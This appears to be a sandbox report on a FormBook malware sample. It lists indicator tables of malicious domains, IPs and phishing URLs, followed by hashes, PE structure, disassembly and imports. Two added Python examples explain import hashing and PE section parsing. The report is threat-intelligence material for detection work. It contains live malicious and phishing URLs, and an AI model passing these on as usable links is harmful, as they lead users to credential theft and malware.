www.onlineblikje.online | QUOTE2342534.exe | malicious | FormBook | 213.249.67.10
www.onlineblikje.online | PO#001498.exe | malicious | FormBook | 213.249.67.10
www.onlineblikje.online | PO59458.exe | malicious | FormBook | 213.249.67.10
www.bdipjg.asia | PO59458.exe | malicious | FormBook | 78.141.202.204
www.030002832.xyz | p4rsJEIb7k.exe | malicious | FormBook | 161.97.142.144
www.030002832.xyz | VkTNb6p288.exe | malicious | FormBook | 161.97.142.144
Match | Associated Sample Name / URL | Detection | Threat Name | Context
METAREGISTRARNL | VkTNb6p288.exe | malicious | FormBook | 213.249.67.10
METAREGISTRARNL | QUOTE2342534.exe | malicious | FormBook | 213.249.67.10
METAREGISTRARNL | PO#001498.exe | malicious | FormBook | 213.249.67.10
METAREGISTRARNL | PO59458.exe | malicious | FormBook | 213.249.67.10
METAREGISTRARNL | https://pt.surveymonkey.com/tr/v1/te/sye1khVpXMoAOA1o9dS7KswyeoXWRMc0CsiALAVvL9R1AEKLpDw_2FQ_2BjGpzqh9gEIleg14i6r7hX4PBEN8h0srmKEUKwP1mLRZLbUUusCb9ijP9SUb3shd8eAxCFYZdX_2BMEbjAe9Z41yfltVavABteyxJzvgHPE3p8pCRndVvaQ4_3D | malicious | Unknown | 213.249.67.13
METAREGISTRARNL | SaLY22oLht.exe | malicious | Unknown | 213.249.66.9
METAREGISTRARNL | https://plsdworkiqs.com/ | malicious | Unknown | 213.249.67.40
METAREGISTRARNL | http://213.249.67.13/plesk-site-preview/chpostcrn.com/https/213.249.67.13/PostCH/ | malicious | Unknown | 213.249.67.13
VXCHNGE-NC01US | rDebitadvice22_10_2024.exe | malicious | FormBook | 184.94.215.26
VXCHNGE-NC01US | Products Order Catalogs20242.exe | malicious | FormBook | 184.94.215.26
VXCHNGE-NC01US | Pending invoices.exe | malicious | FormBook | 184.94.215.26
VXCHNGE-NC01US | SOA SIL TL382920.exe | malicious | FormBook | 184.94.215.26
VXCHNGE-NC01US | https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDs09VcyycT&sa=t&esrc=s09VcFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJC1GniFlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fanoboy.pw%2Fojo%2Flok%2F4905038053/#bGVvbi5sYXZpbkB5b2RlbC5jby51aw===$%E3%80%82 | malicious | EvilProxy, HTMLPhisher | 184.94.212.131
VXCHNGE-NC01US | FATURALAR PDF.exe | malicious | FormBook | 184.94.212.115
VXCHNGE-NC01US | FirstfedwebInv27-1486.html | malicious | BlackHacker JS Obfuscator | 130.250.191.5
VXCHNGE-NC01US | https://lookerstudio.google.com/s/mPdl62g0mi8 | malicious | EvilProxy, HTMLPhisher | 184.94.212.131
VXCHNGE-NC01US | DHL airwaybill # 6913321715 & BL Draft copy.exe | malicious | FormBook | 184.94.212.115
VXCHNGE-NC01US | https://buysuhagra.shop/ePFcjxsx | malicious | HTMLPhisher |
                                                          • 184.94.212.117
                                                          CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCEn88bvC0fc.exeGet hashmaliciousFormBookBrowse
                                                          • 8.210.49.139
                                                          mBms4I508x.exeGet hashmaliciousFormBookBrowse
                                                          • 47.242.252.174
                                                          arm.elfGet hashmaliciousMirai, GafgytBrowse
                                                          • 47.251.12.143
                                                          sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                          • 8.212.58.110
                                                          https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XSwDnNeW8yycT&sa=t&esrc=nNeW8FA0xys8Em2FL&source=&cd=tS6T8Tiw9XH&cad=XpPkDfJXVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=am%70%2F%77%77%77%2E%64%65%72%79%61%6E%63%6F%6E%73%75%6C%74%69%6E%67%2E%63%6F%6D%2F%74%31%62%72%6F%77%6E%34%35%2F1112449584/aGVsZW5AY3VyZXBhcmtpbnNvbnMub3JnLnVrGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                          • 47.251.66.114
                                                          QH6Ue0xtNZ.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                                          • 8.218.85.22
                                                          x86.elfGet hashmaliciousMiraiBrowse
                                                          • 8.215.187.97
                                                          nullnet_load.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 8.221.93.251
                                                          nullnet_load.i486.elfGet hashmaliciousMiraiBrowse
                                                          • 47.241.252.253
                                                          NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                          • 8.210.3.99
                                                          CONTABODEp4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          REVISED PO NO.8389.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 164.68.127.9
                                                          COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          evhopi.ps1Get hashmaliciousLummaCBrowse
                                                          • 173.249.62.85
                                                          Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                          • 161.97.132.254
                                                          https://v90hdblg6c012.b-cdn.net/ppo45-fill-captch.htmlGet hashmaliciousLummaCBrowse
                                                          • 173.249.62.84
                                                          Ponta Saheb. PO 4400049817.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          New Order list attached.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                          • 161.97.168.245
                                                          No context
                                                          No context
                                                          Process:C:\Windows\SysWOW64\dvdplay.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):114688
                                                          Entropy (8bit):0.9746603542602881
                                                          Encrypted:false
                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\H1CYDJ8LQe.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):288256
                                                          Entropy (8bit):7.995798245243465
                                                          Encrypted:true
                                                          SSDEEP:6144:gJeejH1qbspJXBFVWS5qBM0CPqkDePBNXlIY75Ibvf:gFqc13VWS5q20QqDPBNXDFID
                                                          MD5:90D4A429265E686EB29945C2DC31D3DD
                                                          SHA1:CBFEBCE03AD42C2CB03D520627EFF82B2F467F8F
                                                          SHA-256:403CA5888074EDE128AC1BE3CBBAE307D41A57E6089BAE8323103C0DDFF69383
                                                          SHA-512:7CDCF344830F0F6A60FBBE4EBD9C0C5EDE91F1B5E568EB83543CD987C839616B0187F9F82B6E37BD4018D679A71476F8CC7D28221D4B95EC742AC28B5E5A7175
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.....P4MP...M....u.GZ...mM[...P4MPB2WDW78XIUGYC8NENSPJRP4MPB.WDW9'.GU.P...D..q.:9Gm 0]066Z.;(;)67., n!%$r9Zm..aw)8S]vDXM}C8NENSP3SY.p0%.j$0..8..]...t%).J....-7.(...X?...:+..".SPJRP4MP.wWD.69X....C8NENSPJ.P6L[C9WD.38XIUGYC8N.ZSPJBP4M F2WD.78HIUG[C8HENSPJRP2MPB2WDW7H\IUEYC8NENQP..P4]PB"WDW7(XIEGYC8NE^SPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4c$'J#DW7..MUGIC8N.JSPZRP4MPB2WDW78XIuGY#8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NE
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.469636735149665
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:H1CYDJ8LQe.exe
                                                          File size:1'517'995 bytes
                                                          MD5:8afeae6ec5433e3f0c6903fc107fa851
                                                          SHA1:3e0ed7af55e709fa0bb5c744f59bd94a8f8ab2bf
                                                          SHA256:ff969b79ea4daf4a820a4c21a8d1f8e66d25290902e2e9f131a4a88bb8f5def3
                                                          SHA512:70943df1d0f00d4dd5445f2d6f0ebccaf5f660a58f14b89dfeb6ca339d4f319986f9b5b2c59742a1f3ffbe2564ffb5047115a578820687e07c19564aa5fce9b6
                                                          SSDEEP:24576:KRmJkcoQricOIQxiZY1iaLYus0JMLK15E/ZL4raBisIZx/thFl6TolquiV8q:PJZoQrbTFZY1ia0gJMLUah4r/rnf6To2
                                                          TLSH:3A65F221B9D9C031D2E366B0AE76F35AA53CA523033EE69723C41E354FE45523B29763
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                          Icon Hash:145cfcf8f2e8cc52
                                                          Entrypoint:0x4165c1
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
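An import hash of the kind shown above (the pefile/VirusTotal imphash) is the MD5 of the normalised import table: each module name lowercased with its .dll/.ocx/.sys extension removed, each function name lowercased, entries joined by commas in import-table order. It survives recompilation with a different file hash as long as the import table is unchanged, which is why it is a useful pivot for finding other builds of the same loader stub. The Python below is an added example, not code from this report: the list it hashes is a constructed subset of the imports listed further down, so its digest will not match the report's value, and the ordinal-to-name tables pefile applies for a few system DLLs are omitted.

```python
import hashlib

# Extensions the import-hash normalisation strips from module names.
_STRIP_EXT = (".dll", ".ocx", ".sys")


def imphash_string(imports):
    """Normalise (module, function) pairs into the comma-joined string that
    gets hashed: module lowercased with .dll/.ocx/.sys removed, function
    lowercased, entries kept in import-table order. A function imported by
    ordinal (given as an int here) becomes 'ordN'; the per-DLL ordinal name
    tables pefile consults for a few system DLLs are left out of this example."""
    parts = []
    for module, func in imports:
        module = module.lower()
        for ext in _STRIP_EXT:
            if module.endswith(ext):
                module = module[: -len(ext)]
                break
        name = "ord%d" % func if isinstance(func, int) else func.lower()
        parts.append("%s.%s" % (module, name))
    return ",".join(parts)


def imphash(imports):
    """MD5 of the normalised import string, as a 32-character hex digest."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


def same_import_table(a, b):
    """Two samples share an imphash only when their normalised tables are
    identical; the same entries in a different order give a different hash."""
    return imphash(a) == imphash(b)


# Constructed subset of the imports listed in this report, in table order.
# The report's own Import Hash covers the complete table, so this subset
# does not reproduce it; it only shows how the value is derived.
SAMPLE_IMPORTS = [
    ("WSOCK32.dll", "__WSAFDIsSet"),
    ("WSOCK32.dll", "setsockopt"),
    ("KERNEL32.dll", "VirtualAllocEx"),
    ("KERNEL32.dll", "WriteProcessMemory"),
    ("USER32.dll", "BlockInput"),
]

if __name__ == "__main__":
    print(imphash_string(SAMPLE_IMPORTS))
    print(imphash(SAMPLE_IMPORTS))
```

When pivoting, compare normalised strings as well as digests: two hashes differ on a single reordered entry, so a loader that appends one import to evade imphash matching still shows an almost identical normalised string.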
                                                          Instruction
                                                          call 00007FB9F87CB92Bh
                                                          jmp 00007FB9F87C279Eh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [ebp+0Ch]
                                                          mov ecx, dword ptr [ebp+10h]
                                                          mov edi, dword ptr [ebp+08h]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007FB9F87C291Ah
                                                          cmp edi, eax
                                                          jc 00007FB9F87C2AB6h
                                                          cmp ecx, 00000080h
                                                          jc 00007FB9F87C292Eh
                                                          cmp dword ptr [004A9724h], 00000000h
                                                          je 00007FB9F87C2925h
                                                          push edi
                                                          push esi
                                                          and edi, 0Fh
                                                          and esi, 0Fh
                                                          cmp edi, esi
                                                          pop esi
                                                          pop edi
                                                          jne 00007FB9F87C2917h
                                                          jmp 00007FB9F87C2CF2h
                                                          test edi, 00000003h
                                                          jne 00007FB9F87C2926h
                                                          shr ecx, 02h
                                                          and edx, 03h
                                                          cmp ecx, 08h
                                                          jc 00007FB9F87C293Bh
                                                          rep movsd
                                                          jmp dword ptr [00416740h+edx*4]
                                                          mov eax, edi
                                                          mov edx, 00000003h
                                                          sub ecx, 04h
                                                          jc 00007FB9F87C291Eh
                                                          and eax, 03h
                                                          add ecx, eax
                                                          jmp dword ptr [00416654h+eax*4]
                                                          jmp dword ptr [00416750h+ecx*4]
                                                          nop
                                                          jmp dword ptr [004166D4h+ecx*4]
                                                          nop
                                                          inc cx
                                                          add byte ptr [eax-4BFFBE9Ah], dl
                                                          inc cx
                                                          add byte ptr [ebx], ah
                                                          ror dword ptr [edx-75F877FAh], 1
                                                          inc esi
                                                          add dword ptr [eax+468A0147h], ecx
                                                          add al, cl
                                                          jmp 00007FB9FAC3B117h
                                                          add esi, 03h
                                                          add edi, 03h
                                                          cmp ecx, 08h
                                                          jc 00007FB9F87C28DEh
                                                          rep movsd
                                                          jmp dword ptr [00000000h+edx*4]
                                                          Programming Language:
                                                          • [ C ] VS2010 SP1 build 40219
                                                          • [C++] VS2010 SP1 build 40219
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2010 SP1 build 40219
                                                          • [RES] VS2010 SP1 build 40219
                                                          • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x389c0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x389c0 | 0x38a00 | 209d9a28b1f7cc093888bdcf80f94fdd | False | 0.46523609961368656 | data | 6.550670989017651 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
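The "Is in Section" column of the data-directory table and the "Entropy (8bit)" figures on the sections and dropped files both come straight from the PE header and the bytes it describes. The Python below is an added example, not part of the Joe Sandbox report: it parses the section table and data directories from raw header bytes, resolves each directory RVA to the section whose in-memory range covers it, and computes 8-bit Shannon entropy. The section virtual addresses, sizes and directory RVAs are the ones reported for this sample; the report does not give file offsets, so the PointerToRawData values in the constructed header are assumed.

```python
import math
import struct
from collections import Counter

# Data-directory slot order in the PE optional header; slot i is DIRECTORY_NAMES[i].
DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 to 8.0), the figure the report
    labels 'Entropy (8bit)'. Values close to 8 indicate packed or encrypted data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Walk the section table; returns [(name, va, vsize, raw_ptr, raw_size)]."""
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections, = struct.unpack_from("<H", pe, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size        # section headers follow the optional header
    out = []
    for i in range(num_sections):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        out.append((name, va, vsize, raw_ptr, raw_size))
    return out


def parse_data_directories(pe: bytes):
    """Return {name: (rva, size)} for every populated data-directory slot."""
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    opt = e_lfanew + 24
    magic, = struct.unpack_from("<H", pe, opt)
    pe32 = magic == 0x10B                   # 0x20B would be PE32+
    count, = struct.unpack_from("<I", pe, opt + (92 if pe32 else 108))
    base = opt + (96 if pe32 else 112)
    dirs = {}
    for i in range(min(count, len(DIRECTORY_NAMES))):
        rva, size = struct.unpack_from("<II", pe, base + 8 * i)
        if rva or size:
            dirs[DIRECTORY_NAMES[i]] = (rva, size)
    return dirs


def section_for_rva(sections, rva):
    """Name of the section whose mapped range covers rva, or None if no section does."""
    for name, va, vsize, _, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return name
    return None


def directory_sections(pe: bytes):
    """The report's 'Is in Section' column: data directory name -> section name.
    A directory that resolves to None points outside every section and deserves a look."""
    secs = parse_sections(pe)
    return {name: section_for_rva(secs, rva)
            for name, (rva, _) in parse_data_directories(pe).items()}


def build_pe32_header(sections, dirs):
    """Constructed minimal PE32 header (no code) with the given section layout and
    data directories, so the parsers above can be exercised offline."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    # Machine i386, section count, SizeOfOptionalHeader 224, characteristics as reported
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0123)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)    # PE32 magic
    struct.pack_into("<I", opt, 92, 16)      # NumberOfRvaAndSizes
    for name, (rva, size) in dirs.items():
        struct.pack_into("<II", opt, 96 + 8 * DIRECTORY_NAMES.index(name), rva, size)
    hdrs = b"".join(
        name.encode().ljust(8, b"\0")
        + struct.pack("<IIIIIIHHI", vsize, va, raw_size, raw_ptr, 0, 0, 0, 0, chars)
        for name, va, vsize, raw_ptr, raw_size, chars in sections)
    return bytes(dos) + coff + bytes(opt) + hdrs


# Layout from the report above; raw file offsets (4th field) are assumed values.
SAMPLE_SECTIONS = [
    (".text",  0x1000,  0x8061c, 0x400,   0x80800, 0x60000020),
    (".rdata", 0x82000, 0xdfc0,  0x80c00, 0xe000,  0x40000040),
    (".data",  0x90000, 0x1a758, 0x8ec00, 0x6800,  0xC0000040),
    (".rsrc",  0xab000, 0x389c0, 0x95400, 0x38a00, 0x40000040),
]
SAMPLE_DIRS = {"IMPORT": (0x8d41c, 0x154), "RESOURCE": (0xab000, 0x389c0), "IAT": (0x82000, 0x844)}

if __name__ == "__main__":
    hdr = build_pe32_header(SAMPLE_SECTIONS, SAMPLE_DIRS)
    for d, s in directory_sections(hdr).items():
        print(f"{d:<10} -> {s}")
    print("entropy of constructed header:", round(shannon_entropy(hdr), 3))
```

On a real file, run `shannon_entropy` over each section's raw bytes (`pe[raw_ptr:raw_ptr + raw_size]`) rather than the whole image; a high-entropy section with little code is where a packed payload usually sits, and the 288256-byte dropped file above (entropy 7.9958, Encrypted: true) is what that looks like once written to disk.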
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0xe0be | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9943859283206452
RT_ICON | 0xb9a00 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.2501330888441973
RT_ICON | 0xca228 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | Great Britain | 0.30849274752995587
RT_ICON | 0xd36d0 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | Great Britain | 0.31963955637707947
RT_ICON | 0xd8b58 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | Great Britain | 0.3098134152102031
RT_ICON | 0xdcd80 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.3566390041493776
RT_ICON | 0xdf328 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.4268292682926829
RT_ICON | 0xe03d0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | Great Britain | 0.49631147540983606
RT_ICON | 0xe0d58 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.5886524822695035
RT_MENU | 0xe11c0 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xe1210 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xe1310 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xe1840 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xe1ed0 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xe23a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xe29a0 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xe3000 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xe3388 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xe34e0 | 0x84 | data | English | Great Britain | 0.75
RT_GROUP_ICON | 0xe3568 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xe3580 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xe3598 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xe35b0 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xe3750 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, 